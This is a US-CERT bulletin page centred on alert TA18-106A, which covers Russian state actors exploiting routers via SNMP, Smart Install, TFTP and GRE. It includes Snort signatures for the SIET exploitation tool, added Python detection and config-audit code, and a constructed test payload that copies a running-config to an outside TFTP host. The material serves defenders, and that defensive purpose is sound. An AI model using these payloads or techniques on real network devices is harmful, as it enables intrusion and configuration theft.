Security Bulletins

US-CERT: The United States Computer Emergency Readiness Team
last updated: Mon, 23 Apr 2018 14:45:02 GMT

 Thu, 19 Apr 2018 00:23:26 +0000 Drupal Releases Security Updates
Original release date: April 18, 2018

Drupal has released updates addressing a vulnerability in Drupal 8 and 7. A remote attacker could exploit this vulnerability to gain access to sensitive information.

NCCIC encourages users and administrators to review the Drupal Security Advisory for additional information and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 18 Apr 2018 20:19:34 +0000 Cisco Releases Security Updates for Multiple Products
Original release date: April 18, 2018

Cisco has released several updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:




 Wed, 18 Apr 2018 16:59:01 +0000 Google Releases Security Update for Chrome
Original release date: April 18, 2018

Google has released Chrome version 66.0.3359.117 for Windows, Mac, and Linux. This version addresses vulnerabilities that a remote attacker could exploit to take control of an affected system.

NCCIC encourages users and administrators to review the Chrome Releases page and apply the necessary update.




 Tue, 17 Apr 2018 22:11:30 +0000 Oracle Releases April 2018 Security Bulletin
Original release date: April 17, 2018

Oracle has released its Critical Patch Update for April 2018 to address 254 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the Oracle April 2018 Critical Patch Update and apply the necessary updates.




 Mon, 16 Apr 2018 17:25:40 +0000 TA18-106A: Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices
Original release date: April 16, 2018 | Last revised: April 20, 2018

Systems Affected

  • Generic Routing Encapsulation (GRE) Enabled Devices
  • Cisco Smart Install (SMI) Enabled Devices
  • Simple Network Management Protocol (SNMP) Enabled Network Devices

Overview

Update: On April 19, 2018, an industry partner notified NCCIC and the FBI of malicious cyber activity that aligns with the tactics, techniques, and procedures (TTPs) and network indicators listed in this Alert. Specifically, the industry partner reported that the actors redirected DNS queries to their own infrastructure by creating GRE tunnels and obtained sensitive information, including the configuration files of networked devices.

NCCIC encourages organizations to use the detection and prevention guidelines outlined in this Alert to help defend against this activity. For instance, administrators should inspect for IP protocol 47 (GRE) traffic flowing to or from unexpected addresses, and for unexplained GRE tunnel creation, modification, or destruction in device log files.

Original Post: This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the United Kingdom’s National Cyber Security Centre (NCSC). This TA provides information on the worldwide cyber exploitation of network infrastructure devices (e.g., router, switch, firewall, Network-based Intrusion Detection System (NIDS) devices) by Russian state-sponsored cyber actors. Targets are primarily government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors. This report contains technical details on the tactics, techniques, and procedures (TTPs) used by Russian state-sponsored cyber actors to compromise victims. Victims were identified through a coordinated series of actions between U.S. and international partners. This report builds on previous DHS reporting and advisories from the United Kingdom, Australia, and the European Union. [1-5] This report contains indicators of compromise (IOCs) and contextual information regarding observed behaviors on the networks of compromised victims. FBI has high confidence that Russian state-sponsored cyber actors are using compromised routers to conduct man-in-the-middle attacks to support espionage, extract intellectual property, maintain persistent access to victim networks, and potentially lay a foundation for future offensive operations.

DHS, FBI, and NCSC urge readers to act on past alerts and advisories issued by the U.S. and U.K. Governments, allied governments, network device manufacturers, and private-sector security organizations. Elements from these alerts and advisories have been selected and disseminated in a wide variety of security news outlets and social media platforms. The current state of U.S. network devices—coupled with a Russian government campaign to exploit these devices—threatens the safety, security, and economic well-being of the United States.

The purpose of this TA is to inform network device vendors, ISPs, public-sector organizations, private-sector corporations, and small office home office (SOHO) customers about the Russian government campaign, provide information to identify malicious activity, and reduce exposure to this activity.

For a downloadable copy of the IOC package, see TA18-106A_TLP_WHITE.stix.xml.

Description

Since 2015, the U.S. Government received information from multiple sources—including private and public sector cybersecurity research organizations and allies—that cyber actors are exploiting large numbers of enterprise-class and SOHO/residential routers and switches worldwide. The U.S. Government assesses that cyber actors supported by the Russian government carried out this worldwide campaign. These operations enable espionage and intellectual property theft that supports the Russian Federation’s national security and economic goals.

Legacy Protocols and Poor Security Practice

Russian cyber actors leverage a number of legacy or weak protocols and service ports associated with network administration activities. Cyber actors use these weaknesses to

  • identify vulnerable devices;
  • extract device configurations;
  • map internal network architectures;
  • harvest login credentials;
  • masquerade as privileged users;
  • modify
    • device firmware,
    • operating systems,
    • configurations; and
  • copy or redirect victim traffic through Russian cyber-actor-controlled infrastructure.

Additionally, Russian cyber actors could potentially modify or deny traffic traversing through the router.

Russian cyber actors do not need to leverage zero-day vulnerabilities or install malware to exploit these devices. Instead, cyber actors take advantage of the following vulnerabilities:

  • devices with legacy unencrypted protocols or unauthenticated services,
  • devices insufficiently hardened before installation, and
  • devices no longer supported with security patches by manufacturers or vendors (end-of-life devices).

These factors allow for both intermittent and persistent access to both intellectual property and U.S. critical infrastructure that supports the health and safety of the U.S. population.

Own the Router, Own the Traffic

Network devices are ideal targets. Most or all organizational and customer traffic must traverse these critical devices. A malicious actor with presence on an organization's gateway router has the ability to monitor, modify, and deny traffic to and from the organization. A malicious actor with presence on an organization's internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts. Organizations that use legacy, unencrypted protocols to manage hosts and services make successful credential harvesting easy for these actors. An actor controlling a router between Industrial Control Systems – Supervisory Control and Data Acquisition (ICS-SCADA) sensors and controllers in a critical infrastructure—such as the Energy Sector—can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.

Network Devices—Often Easy Targets

Network devices are often easy targets. Once installed, many network devices are not maintained at the same security level as other general-purpose desktops and servers. The following factors can also contribute to the vulnerability of network devices:

  • Few network devices—especially SOHO and residential-class routers—run antivirus, integrity-maintenance, and other security tools that help protect general purpose hosts.
  • Manufacturers build and distribute these network devices with exploitable services, which are enabled for ease of installation, operation, and maintenance.
  • Owners and operators of network devices do not change vendor default settings, harden them for operations, or perform regular patching.
  • ISPs do not replace equipment on a customer’s property when that equipment is no longer supported by the manufacturer or vendor.
  • Owners and operators often overlook network devices when they investigate, examine for intruders, and restore general-purpose hosts after cyber intrusions.

Impact

Stage 1: Reconnaissance

Russian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of Internet address spaces. Such scanning allows these actors to identify enabled Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices. Protocols targeted in this scanning include

  • Telnet (typically Transmission Control Protocol (TCP) port 23, but traffic can be directed to a wide range of TCP ports such as 80, 8080, etc.),
  • Hypertext Transfer Protocol (HTTP, TCP port 80),
  • Simple Network Management Protocol (SNMP, UDP ports 161/162), and
  • Cisco Smart Install (SMI, TCP port 4786).

Login banners and other data collected from enabled services can reveal the make and model of the device and information about the organization for future engagement.

Device configuration files extracted in previous operations can enhance the reconnaissance effort and allow these actors to refine their methodology.

Stage 2: Weaponization and Stage 3: Delivery

Commercial and government security organizations have identified specially crafted SNMP and SMI packets that trigger the scanned device to send its configuration file to a cyber-actor-controlled host via Trivial File Transfer Protocol (TFTP), User Datagram Protocol (UDP) port 69. [6-8] If the targeted network is blocking external SNMP at the network boundary, cyber actors spoof the source address of the SNMP UDP datagram so that it appears to come from inside the targeted network. The design of SMI (directors and clients) requires the director and clients to be on the same network. However, because SMI is an unauthenticated protocol, the source address is the only thing that distinguishes a legitimate director from a bogus one, and SMI does not verify it; since SMI runs over TCP (port 4786), the practical exposure is any host that can reach the device on that port and complete the handshake, rather than a blindly spoofed datagram as with SNMP.

The configuration file contains a significant amount of information about the scanned device, including password hash values. These values allow cyber actors to derive legitimate credentials. The configuration file also contains SNMP community strings and other network information that allows the cyber actors to build network maps and facilitate future targeted exploitation.

Stage 4: Exploitation

Legitimate user masquerade is the primary method by which these cyber actors exploit targeted network devices. In some cases, the actors use brute-force attacks to obtain Telnet and SSH login credentials. However, for the most part, cyber actors are able to easily obtain legitimate credentials, which they then use to access routers. Organizations that permit default or commonly used passwords, have weak password policies, or permit passwords that can be derived from credential-harvesting activities allow cyber actors to easily guess or access legitimate user credentials. Cyber actors can also access legitimate credentials by extracting password hash values from configurations sent by owners and operators across the Internet or by SNMP and SMI scanning.

Armed with the legitimate credentials, cyber actors can authenticate into the device as a privileged user via remote management services such as Telnet, SSH, or the web management interface.

Stage 5: Installation

SMI is an unauthenticated management protocol developed by Cisco. This protocol supports a feature that allows network administrators to download or overwrite any file on any Cisco router or switch that supports this feature. This feature is designed to enable network administrators to remotely install and configure new devices and install new OS files.

On November 18, 2016, a Smart Install Exploitation Tool (SIET) was posted to the Internet. The SIET takes advantage of the unauthenticated SMI design. Commercial and government security organizations have noted that Russian state-sponsored cyber actors have leveraged the SIET to abuse SMI to download current configuration files. Of concern, any actor may leverage this capability to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. Additionally, these network devices have writeable file structures where malware for other platforms may be stored to support lateral movement throughout the targeted network.

Stage 6: Command and Control

Cyber actors masquerade as legitimate users to log into a device or establish a connection via a previously uploaded OS image with a backdoor. Once successfully logged into the device, cyber actors execute privileged commands. These cyber actors create a man-in-the-middle scenario that allows them to

  • extract additional configuration information,
  • export the OS image file to an externally located cyber actor-controlled FTP server,
  • modify device configurations,
  • create Generic Routing Encapsulation (GRE) tunnels, or
  • mirror or redirect network traffic through other network infrastructure they control.

At this stage, cyber actors are not restricted from modifying or denying traffic to and from the victim. Although there are no reports of this activity, it is technically possible.

Solution

Telnet

Review network device logs and netflow data for indications of TCP Telnet-protocol traffic directed at port 23 on all network device hosts. Although Telnet may be directed at other ports (e.g., port 80, HTTP), port 23 is the primary target. Inspect any indication of Telnet sessions (or attempts). Because Telnet is an unencrypted protocol, session traffic will reveal command line interface (CLI) command sequences appropriate for the make and model of the device. CLI strings may reveal login procedures, presentation of user credentials, commands to display boot or running configuration, copying files and creation or destruction of GRE tunnels, etc. See Appendices A and B for CLI strings for Cisco and other vendors’ devices.

SNMP and TFTP

Review network device logs and netflow data for indications of UDP SNMP traffic directed at port 161/162 on all network-device hosts. Because SNMP is a management tool, any such traffic that is not from a trusted management host on an internal network should be investigated. Review the source address of SNMP traffic for indications of addresses that spoof the address space of the network. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound or spoofed SNMP closely followed by outbound TFTP should be cause for alarm and further inspection. See Appendix C for detection of the cyber actors’ SNMP tactics.

Because TFTP is an unencrypted protocol, session traffic will reveal strings associated with configuration data appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendors' devices.

SMI and TFTP

Review network device logs and netflow data for indications of TCP SMI protocol traffic directed at port 4786 of all network-device hosts. Because SMI is a management feature, any traffic that is not from a trusted management host on an internal network should be investigated. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound SMI closely followed by outbound TFTP should be cause for alarm and further inspection. Of note, between June 29 and July 6, 2017, Russian actors used the SMI protocol to scan for vulnerable network devices. Two Russian cyber actors controlled hosts 91.207.57.69(3) and 176.223.111.160(4), and connected to IPs on several network ranges on port 4786. See Appendix D for detection of the cyber actors’ SMI tactics.

Because TFTP is an unencrypted protocol, session traffic will reveal strings appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendors’ devices.

Determine if SMI is present

  • Examine the output of "show vstack config | inc Role". The presence of "Role: Client (SmartInstall enabled)" indicates that Smart Install is configured.
  • Examine the output of "show tcp brief all" and look for "*:4786". The SMI feature listens on tcp/4786.
  • Note: The commands above will indicate whether the feature is enabled on the device but not whether a device has been compromised.

Detect use of SMI

The following signature may be used to detect SMI usage. Flag as suspicious and investigate SMI traffic arriving from outside the network boundary. If SMI is not used inside the network, any SMI traffic arriving on an internal interface should be flagged as suspicious and investigated for the existence of an unauthorized SMI director. If SMI is used inside the network, ensure that the traffic is coming from an authorized SMI director and not from a bogus director. The sid and rev options appended to the rule here are local-range placeholders added by the editor rather than part of the published signature; Snort requires a sid to load a rule, so assign values that fit your rule set.

  • alert tcp any any -> any 4786 (msg:"Smart Install Protocol"; flow:established,only_stream; content:"|00 00 00 01 00 00 00 01|"; offset:0; depth:8; fast_pattern; sid:1000001; rev:1;)
  • See Cisco recommendations for detecting and mitigating SMI. [9]

Detect use of SIET

The following signatures detect usage of the SIET commands change_config, get_config, update_ios, and execute. These signatures are valid based on the SIET tool available as of early September 2017. The sid and rev values are local-range placeholders added here rather than part of the published rules; adjust them to your rule set:

  • alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_UpdateIos_And_Execute"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 02 00 00 01 c4|"; offset:0; depth:16; fast_pattern; content:"://"; sid:1000002; rev:1;)
  • alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_ChangeConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 03 00 00 01 28|"; offset:0; depth:16; fast_pattern; content:"://"; sid:1000003; rev:1;)
  • alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_GetConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 08 00 00 04 08|"; offset:0; depth:16; fast_pattern; content:"copy|20|"; sid:1000004; rev:1;)

In general, exploitation attempts with the SIET tool will likely arrive from outside the network boundary. However, before attempting to tune or limit the range of these signatures, i.e. with $EXTERNAL_NET or $HOME_NET, it is recommended that they be deployed with the source and destination address ranges set to “any”. This will allow the possibility of detection of an attack from an unanticipated source, and may allow for coverage of devices outside of the normal scope of what may be defined as the $HOME_NET.
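The generic SMI rule and the three SIET signatures all key on the same 16-byte header, so the detection logic is easy to reproduce in a stream reassembler or a PCAP triage script. The following Python is an added example, not code from the advisory or from the SIET tool: it parses the header layout the signatures encode (an 8-byte marker, a 4-byte message type and a 4-byte length, both assumed big-endian), applies the type/length/substring checks exactly as the Snort rules do, and runs them over constructed sample payloads (the TFTP URLs use RFC 5737 documentation addresses).

```python
"""Classify Cisco Smart Install (SMI) messages the way the Snort signatures do.

Added example, not code from the advisory.  The header layout is the one the
signatures encode: bytes 0-7 fixed marker, bytes 8-11 message type, bytes 12-15
length (big-endian assumed).  All sample payloads are constructed test data.
"""
import struct
from typing import Optional, Tuple

SMI_MARKER = b"\x00\x00\x00\x01\x00\x00\x00\x01"

# (msg_type, length, substring that must appear anywhere in the packet) -> rule name
SIET_SIGNATURES = {
    (0x02, 0x01C4, b"://"):   "SmartInstallExploitationTool_UpdateIos_And_Execute",
    (0x03, 0x0128, b"://"):   "SmartInstallExploitationTool_ChangeConfig",
    (0x08, 0x0408, b"copy "): "SmartInstallExploitationTool_GetConfig",
}


def parse_smi_header(payload: bytes) -> Optional[Tuple[int, int]]:
    """Return (msg_type, length) if the payload starts with an SMI header, else None."""
    if len(payload) < 16 or payload[:8] != SMI_MARKER:
        return None
    return struct.unpack("!II", payload[8:16])


def classify_smi(payload: bytes) -> Optional[str]:
    """None for non-SMI data, a SIET rule name when a SIET signature matches,
    otherwise the generic 'Smart Install Protocol' label."""
    header = parse_smi_header(payload)
    if header is None:
        return None
    msg_type, length = header
    for (sig_type, sig_len, needle), name in SIET_SIGNATURES.items():
        # The rules anchor the 16 header bytes at offset 0 and look for the
        # second content anywhere in the packet, so search the whole payload.
        if msg_type == sig_type and length == sig_len and needle in payload:
            return name
    return "Smart Install Protocol"


def build_smi(msg_type: int, length: int, body: bytes) -> bytes:
    """Construct a payload for the samples below (test data only)."""
    return SMI_MARKER + struct.pack("!II", msg_type, length) + body


# Constructed samples: one per SIET rule, two generic SMI messages, one non-SMI blob
SAMPLES = {
    "get_config": build_smi(0x08, 0x0408,
                            b"copy system:running-config tftp://192.0.2.10/edge.cfg"),
    "change_config": build_smi(0x03, 0x0128, b"tftp://192.0.2.10/new.cfg"),
    "update_ios": build_smi(0x02, 0x01C4, b"tftp://192.0.2.10/image.bin"),
    "update_ios_no_url": build_smi(0x02, 0x01C4, b"\x00" * 16),
    "smi_other": build_smi(0x07, 0x0040, b"\x00" * 16),
    "not_smi": b"GET / HTTP/1.1\r\n",
}


def classify_samples() -> dict:
    """Run every constructed sample through the classifier."""
    return {name: classify_smi(payload) for name, payload in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:18s} -> {verdict}")
```

The update_ios_no_url sample shows why each SIET rule carries a second content match: a message with the update_ios type and length but no URL is reported only as generic SMI, which is exactly how the Snort rules behave and is the reason the advisory recommends flagging any SMI from outside the boundary rather than relying on the SIET-specific rules alone.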

GRE Tunneling

Inspect for IP protocol 47 (GRE) traffic flowing to or from unexpected addresses, and for unexplained GRE tunnel creation, modification, or destruction in device log files.
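The SNMP and TFTP, SMI and TFTP, and GRE Tunneling checks above are all correlations over flow records: a management query to a device, an outbound TFTP transfer from that device shortly afterwards, a source address that cannot legitimately arrive on the outside interface, and protocol 47 with a peer that is not an approved tunnel endpoint. The Python below is an added example, not part of the advisory, that implements those correlations over constructed NetFlow-style records; the address ranges, the device and management-host lists, the approved GRE peers and the 60-second window are assumptions to replace with your own.

```python
"""Correlate flow records for inbound SNMP/SMI followed by outbound TFTP,
spoofed internal sources on the external interface, and GRE to unexpected peers.

Added example, not code from the advisory.  Address ranges, host lists, the
window and the flow records are constructed assumptions for illustration.
"""
import ipaddress
from collections import namedtuple
from typing import List, Tuple

# iface is the interface the flow was seen on: "ext" (Internet-facing) or "int"
Flow = namedtuple("Flow", "ts iface src dst proto sport dport")

UDP, TCP, GRE = 17, 6, 47

INTERNAL = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
DEVICES = {"10.0.0.1"}            # managed routers/switches (assumed)
MGMT_HOSTS = {"10.0.0.5"}         # authorized SNMP pollers / SMI director (assumed)
GRE_PEERS = {"198.51.100.1"}      # approved tunnel endpoints (assumed)
WINDOW = 60                       # seconds from management query to outbound TFTP

Alert = Tuple[int, str, str, str]  # (ts, reason, src, dst)


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def is_mgmt_query(f: Flow) -> bool:
    """SNMP (udp/161-162) or Smart Install (tcp/4786) directed at a managed device."""
    snmp = f.proto == UDP and f.dport in (161, 162)
    smi = f.proto == TCP and f.dport == 4786
    return (snmp or smi) and f.dst in DEVICES


def analyze(flows: List[Flow]) -> List[Alert]:
    alerts: List[Alert] = []
    queries: List[Flow] = []          # management queries seen so far, for correlation
    for f in sorted(flows, key=lambda x: x.ts):
        if is_mgmt_query(f):
            if f.src not in MGMT_HOSTS:
                alerts.append((f.ts, "mgmt query from untrusted host", f.src, f.dst))
            if f.iface == "ext" and is_internal(f.src):
                # an internal address arriving on the outside interface is spoofed
                alerts.append((f.ts, "spoofed internal source on external interface", f.src, f.dst))
            queries.append(f)
        elif f.proto == UDP and f.dport == 69 and f.src in DEVICES and not is_internal(f.dst):
            alerts.append((f.ts, "tftp from device to internet host", f.src, f.dst))
            recent = [q for q in queries if q.dst == f.src and 0 <= f.ts - q.ts <= WINDOW]
            if recent:
                # report the query that most plausibly triggered the config push
                alerts.append((f.ts, "mgmt query followed by outbound tftp", recent[-1].src, f.dst))
        elif f.proto == GRE and (f.src in DEVICES or f.dst in DEVICES):
            peer = f.dst if f.src in DEVICES else f.src
            if peer not in GRE_PEERS:
                alerts.append((f.ts, "gre with unexpected peer", f.src, f.dst))
    return alerts


# Constructed flow records (ts in seconds); addresses are RFC 5737 / RFC 1918 ranges
SAMPLE_FLOWS = [
    Flow(100, "int", "10.0.0.5", "10.0.0.1", UDP, 40000, 161),       # routine poll from NMS
    Flow(200, "ext", "10.0.0.77", "10.0.0.1", UDP, 40001, 161),      # spoofed internal source
    Flow(203, "ext", "10.0.0.1", "203.0.113.9", UDP, 50000, 69),     # device pushes config out
    Flow(300, "ext", "203.0.113.9", "10.0.0.1", TCP, 51000, 4786),   # SMI from the Internet
    Flow(305, "ext", "10.0.0.1", "203.0.113.9", UDP, 50001, 69),     # config out again
    Flow(400, "ext", "10.0.0.1", "198.51.100.1", GRE, 0, 0),         # approved tunnel
    Flow(500, "ext", "10.0.0.1", "203.0.113.50", GRE, 0, 0),         # unexpected tunnel
]

if __name__ == "__main__":
    for ts, reason, src, dst in analyze(SAMPLE_FLOWS):
        print(f"t={ts:<4} {src:>14} -> {dst:<14} {reason}")
```

The routine poll from the management host produces nothing, while each Internet-sourced or spoofed query is reported once on its own and again when the device answers with TFTP to an outside host within the window; that second alert is the one worth paging on.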

Mitigation Strategies

There is a significant amount of publicly available cybersecurity guidance and best practices from DHS, allied governments, vendors, and the private-sector cybersecurity community on mitigation strategies for the exploitation vectors described above. The following are additional mitigations for network device manufacturers, ISPs, and owners or operators.

General Mitigations

All

  • Do not allow unencrypted (i.e., plaintext) management protocols (e.g. Telnet) to enter an organization from the Internet. When encrypted protocols such as SSH, HTTPS, or TLS are not possible, management activities from outside the organization should be done through an encrypted Virtual Private Network (VPN) where both ends are mutually authenticated.
  • Do not allow Internet access to the management interface of any network device. The best practice is to block Internet-sourced access to the device management interface and restrict device management to an internal trusted and whitelisted host or LAN. If access to the management interface cannot be restricted to an internal trusted network, restrict remote management access via encrypted VPN capability where both ends are mutually authenticated. Whitelist the network or host from which the VPN connection is allowed, and deny all others.
  • Disable legacy unencrypted protocols such as Telnet and SNMPv1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMPv3. Harden the encrypted protocols based on current best security practice. DHS strongly advises owners and operators to retire and replace legacy devices that cannot be configured to use SNMPv3.
  • Immediately change default passwords and enforce a strong password policy. Do not reuse the same password across multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication, and implement two-factor authentication based on public-private keys. See NCCIC/US-CERT TA13-175A – Risks of Default Passwords on the Internet, last revised October 7, 2016.

Manufacturers

  • Do not design products to support legacy or unencrypted protocols. If this is not possible, deliver the products with these legacy or unencrypted protocols disabled by default, and require the customer to enable the protocols after accepting an interactive risk warning. Additionally, restrict these protocols to accept connections only from private addresses (i.e., RFC 1918).
  • Do not design products with unauthenticated services. If this is not possible, deliver the products with these unauthenticated services disabled by default, and require the customer to enable the services after accepting an interactive risk warning. Additionally, these unauthenticated services should be restricted to accept connections only from private address space (i.e., RFC 1918).
  • Design installation procedures or scripts so that the customer is required to change all default passwords. Encourage the use of authentication services that do not depend on passwords, such as RSA-based Public Key Infrastructure (PKI) keys.
  • Because YARA has become a security-industry standard way of describing rules for detecting malicious code on hosts, consider embedding YARA or a YARA-like capability to ingest and use YARA rules on routers, switches, and other network devices.

Security Vendors

  • Produce and publish YARA rules for malware discovered on network devices.

ISPs

  • Do not field equipment in the network core or to customer premises with legacy, unencrypted, or unauthenticated protocols and services. When purchasing equipment from vendors, include this requirement in purchase agreements.
  • Disable legacy, unencrypted, or unauthenticated protocols and services. Use modern encrypted management protocols such as SSH. Harden the encrypted protocols based on current best security practices from the vendor.
  • Initiate a plan to upgrade fielded equipment no longer supported by the vendor with software updates and security patches. The best practice is to field only supported equipment and replace legacy equipment prior to it falling into an unsupported state.
  • Apply software updates and security patches to fielded equipment. When that is not possible, notify customers about software updates and security patches and provide timely instructions on how to apply them.

Owners or operators

  • Specify in contracts that the ISP providing service will only field currently supported network equipment and will replace equipment when it falls into an unsupported state.
  • Specify in contracts that the ISP will regularly apply software updates and security patches to fielded network equipment or will notify and provide the customers the ability to apply them.
  • Block TFTP from leaving the organization destined for Internet-based hosts. Network devices should be configured to send configuration data to a secured host on a trusted segment of the internal management LAN.
  • Verify that the firmware and OS on each network device are from a trusted source and issued by the manufacturer. To validate the integrity of network devices, refer to the vendor’s guidance, tools, and processes. See Cisco’s Security Center for guidance to validate Cisco IOS firmware images.
  • Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). The indicators in Appendix A may be applicable to your device.

Detailed Mitigations

Refer to the vendor-specific guidance for the make and model of network device in operation.

For information on mitigating SNMP vulnerabilities, see

How to Mitigate SMI Abuse

  • Configure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the “no vstack” command before placing the device into operation.
  • Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI.
  • Prohibit outbound network traffic to external devices over UDP port 69 via TFTP.
  • See Cisco recommendations for detecting and mitigating SMI. [10]
  • Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it.
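The General Mitigations above, together with "Determine if SMI is present" and the SMI mitigation list, describe settings an operator can verify in an exported running-config before a device goes into service. The Python audit below is an added example, not code from the advisory or from Cisco: it flags Telnet on vty lines, vty lines without an access-class, SNMPv1/v2c community strings, plaintext HTTP management, "enable password", plaintext and type 7 (reversible) passwords, and the absence of a "no vstack" line. Both configs are constructed; the vstack check is a text heuristic, and "show vstack config" on the device remains the authoritative test.

```python
"""Audit an exported Cisco IOS running-config for the weak settings the
mitigations tell operators to remove.  Added example, not advisory code.
Both configs below are constructed; the vstack check is a heuristic.
"""
import re
from typing import List, Tuple

Finding = Tuple[str, str]   # (severity, description)


def _stanzas(config: str):
    """Group a config into (header, [indented body lines]); skip '!' comments."""
    stanzas = []
    for raw in config.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw.startswith(" ") and stanzas:
            stanzas[-1][1].append(raw.strip())
        else:
            stanzas.append((raw.strip(), []))
    return stanzas


def _check_password(line: str, where: str, out: List[Finding]) -> None:
    """Type 0 (or no type) is plaintext; type 7 is trivially reversible."""
    m = re.search(r"\bpassword(?: (\d+))? (\S+)$", line)
    if not m:
        return
    ptype = m.group(1) or "0"
    if ptype == "0":
        out.append(("HIGH", f"plaintext password in '{where}'"))
    elif ptype == "7":
        out.append(("HIGH", f"type 7 (reversible) password in '{where}'"))


def audit_ios_config(config: str) -> List[Finding]:
    findings: List[Finding] = []
    saw_no_vstack = False
    for head, body in _stanzas(config):
        if head == "no vstack":
            saw_no_vstack = True
        if head == "ip http server":
            findings.append(("MEDIUM", "plaintext HTTP management enabled; use 'no ip http server' and 'ip http secure-server'"))
        m = re.match(r"snmp-server community (\S+)(?: (RO|RW))?", head)
        if m:
            name, mode = m.group(1), m.group(2) or "RO"
            findings.append(("HIGH" if mode == "RW" else "MEDIUM",
                             f"SNMPv1/v2c community '{name}' ({mode}); move to SNMPv3 authPriv"))
        if head.startswith("enable password"):
            findings.append(("HIGH", "'enable password' in use; replace with 'enable secret'"))
        _check_password(head, head.split()[0], findings)
        if head.startswith("line vty"):
            transport = [b for b in body if b.startswith("transport input")]
            if any("telnet" in t or t.endswith(" all") for t in transport):
                findings.append(("HIGH", f"{head}: Telnet permitted; use 'transport input ssh'"))
            if not any(b.startswith("access-class") for b in body):
                findings.append(("MEDIUM", f"{head}: no access-class; restrict to management hosts"))
        for b in body:
            _check_password(b, head, findings)
    if not saw_no_vstack:
        findings.append(("MEDIUM", "no 'no vstack' line; Smart Install may be enabled, confirm with 'show vstack config'"))
    return findings


WEAK_CONFIG = """\
hostname edge-rtr
!
enable password 7 0822455D0A16
username admin password 0 Cisco123
!
ip http server
snmp-server community public RO
snmp-server community private RW
!
line vty 0 4
 password cisco
 login
 transport input telnet ssh
!
"""

HARDENED_CONFIG = """\
no vstack
enable secret 9 $9$placeholder
username admin secret 9 $9$placeholder
!
no ip http server
ip http secure-server
ip access-list standard MGMT
 permit 10.0.0.5
snmp-server group NETMON v3 priv
!
line vty 0 4
 access-class MGMT in
 login local
 transport input ssh
!
"""

if __name__ == "__main__":
    for sev, desc in audit_ios_config(WEAK_CONFIG):
        print(f"[{sev:6s}] {desc}")
```

Run it against a config pulled over an encrypted channel to a trusted host, never one retrieved by TFTP across the Internet, since the exported file contains exactly the password material the advisory describes the actors harvesting.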

How to Mitigate GRE Tunneling Abuse:

  • Verify that all routing tables configured in each border device are set to communicate with known and trusted infrastructure.
  • Verify that any GRE tunnels established from border routers are legitimate and are configured to terminate at trusted endpoints.

 

Definitions

Operating System Fingerprinting is analyzing characteristics of packets sent by a target, such as packet headers or listening ports, to identify the operating system in use on the target. [11]

Spear phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they were sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information, such as account usernames and passwords, which can further expose them to future compromises. [12]

In a watering hole attack, the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. [13]

 

Report Notice

DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to NCCIC or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division at CyWatch@fbi.gov or 855-292-3937. To request information from or report cyber incidents to UK authorities, contact NCSC at www.ncsc.gov.uk/contact.

 

Appendix A: Cisco Related Command and Configuration Strings

Command Strings.

Commands associated with Cisco IOS. These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, in the logs of application layer firewalls, or in the logs of network devices. Network device owners and operators should review the Cisco documentation of their particular makes and models for strings that would allow the owner or operator to customize the list for an Intrusion Detection System (IDS). Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.

Strings:

'sh arp'           
'sho arp'           
'show arp'
'sh bgp sum'       
'sho bgp sum'       
'show bgp sum'
'sh cdp'           
'sho cdp'           
'show cdp'
'sh con'           
'sho con'
'show con'
'sh ip route'     
'sho ip route'      
'show ip route'
'sh inv'           
'sho inv'           
'show inv'
'sh int'           
'sho int'           
'show int'
